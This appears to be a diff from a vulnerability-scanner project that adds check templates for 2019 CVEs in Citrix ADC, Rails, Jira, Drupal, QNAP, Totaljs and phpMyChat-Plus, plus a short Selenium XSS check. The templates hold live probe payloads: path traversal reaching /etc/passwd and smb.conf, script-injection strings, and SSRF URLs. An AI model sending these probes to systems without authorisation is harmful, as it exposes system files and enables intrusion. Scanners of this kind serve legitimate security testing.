# Import any WebDriver class that you would usually import from
# selenium.webdriver from the seleniumrequests module
import sys
from seleniumrequests import Firefox
url = sys.argv[1]
# Simple usage with built-in WebDrivers:
webdriver = Firefox()
response = webdriver.request('GET', '%s/en/embeddedAuthRedirect.html?auth=javascript:document.write(1+1336)' % url)
if '1337' in response.text:
print("Vulnerable!")
print(response.text)
webdriver.quit()
SECONDARY_COMMANDS=''

9
templates/active/CVE-2019-19781_-_Citrix_ADC_Directory_Traversal.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2019-19781 - Citrix ADC Directory Traversal'
URI='/vpn/../vpns/cfg/smb.conf'
METHOD='GET'
MATCH='\[global\]'
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

9
templates/active/CVE-2019-19908_-_phpMyChat-Plus_XSS.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2019-19908 - phpMyChat-Plus XSS'
URI="/plus/pass_reset.php?L=english&pmc_username=%22%3E%3Cscript%3Ealert(1337)%3C/script%3E"
METHOD='GET'
MATCH="<script>alert\(1337\)<\/script>"
SEVERITY='P2 - HIGH'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

9
templates/active/CVE-2019-5418_-_Rail_File_Content_Disclosure.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2019-5418 - File Content Disclosure on Rails'
URI="/../../../../../../../../etc/passwd\{\{"
METHOD='GET'
MATCH="root:*:"
SEVERITY='P2 - HIGH'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

9
templates/active/CVE-2019-6340_-_Drupal8_REST_RCE_SA-CORE-2019-003.disabled Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2019-6340 - Drupal8 REST RCE SA-CORE-2019-003'
URI='/node/1?_format=hal_json'
METHOD='GET'
MATCH='INVALID_VALUE\ does\ not\ correspond'
SEVERITY='P1 - CRITICAL'
CURL_OPTS='--user-agent "" -s -L --insecure -H "Content-Type: application/hal+json" --data \'{ "_links": { "type": { "href": "http://192.168.56.101/drupal-8.6.9/rest/type/node/INVALID_VALUE" } }, "type": { "target_id": "article" }, "title": { "value": "My Article" }, "body": { "value": "some body content aaa bbb ccc" }}\' '
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

9
templates/active/CVE-2019-7192_-_QNAP_Pre-Auth_Root_RCE.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2019-7192 - QNAP Pre-Auth Root RCE'
URI='/photo/p/api/video.php'
METHOD='GET'
MATCH="\[\ 401\ Unauthorized\ \]"
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

9
templates/active/CVE-2019-8442_-_Jira_Webroot_Directory_Traversal_1.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2019-8442 - Jira Webroot Directory Traversal 1'
URI="/s/anything/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml"
METHOD='GET'
MATCH='artifactId'
SEVERITY='P2 - HIGH'
CURL_OPTS='-L --user-agent '' -s --insecure'
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

9
templates/active/CVE-2019-8442_-_Jira_Webroot_Directory_Traversal_2.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2019-8442 - Jira Webroot Directory Traversal 2'
URI="/s/anything/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.properties"
METHOD='GET'
MATCH='artifactId'
SEVERITY='P2 - HIGH'
CURL_OPTS='-L --user-agent '' -s --insecure'
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

9
templates/active/CVE-2019-8451_Jira_SSRF_1.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2019-8451 Jira SSRF 1'
URI="/plugins/servlet/gadgets/makeRequest?url=https://127.0.0.1:443@google.com"
METHOD='GET'
MATCH='<title>Google</title>'
SEVERITY='P3 - MEDIUM'
CURL_OPTS='-L -H "X-Atlassian-Token: no-check --user-agent '' -s --insecure'
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

9
templates/active/CVE-2019-8451_Jira_SSRF_2.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2019-8451 Jira SSRF 2'
URI="/jira/plugins/servlet/gadgets/makeRequest?url=https://127.0.0.1:443@google.com"
METHOD='GET'
MATCH='<title>Google</title>'
SEVERITY='P3 - MEDIUM'
CURL_OPTS='-L -H "X-Atlassian-Token: no-check --user-agent '' -s --insecure'
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

9
templates/active/CVE-2019-8451_Jira_SSRF_3.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2019-8451 Jira SSRF 3'
URI="/wiki/plugins/servlet/gadgets/makeRequest?url=https://127.0.0.1:443@google.com"
METHOD='GET'
MATCH='<title>Google</title>'
SEVERITY='P3 - MEDIUM'
CURL_OPTS='-L -H "X-Atlassian-Token: no-check --user-agent '' -s --insecure'
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

9
templates/active/CVE-2019-8451_Jira_SSRF_4.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2019-8451 Jira SSRF 4'
URI="/confluence/plugins/servlet/gadgets/makeRequest?url=https://127.0.0.1:443@google.com"
METHOD='GET'
MATCH='<title>Google</title>'
SEVERITY='P3 - MEDIUM'
CURL_OPTS='-L -H "X-Atlassian-Token: no-check --user-agent '' -s --insecure'
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

9
templates/active/CVE-2019-8903_-_Totaljs_Unathenticated_Directory_Traversal.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2019-8903 - Totaljs - Unathenticated Directory Traversal'
URI="/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/var/www/html/index.html"
METHOD='GET'
MATCH="apache2\.conf"
SEVERITY='P2 - HIGH'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

Some files were not shown because too many files have changed in this diff Show More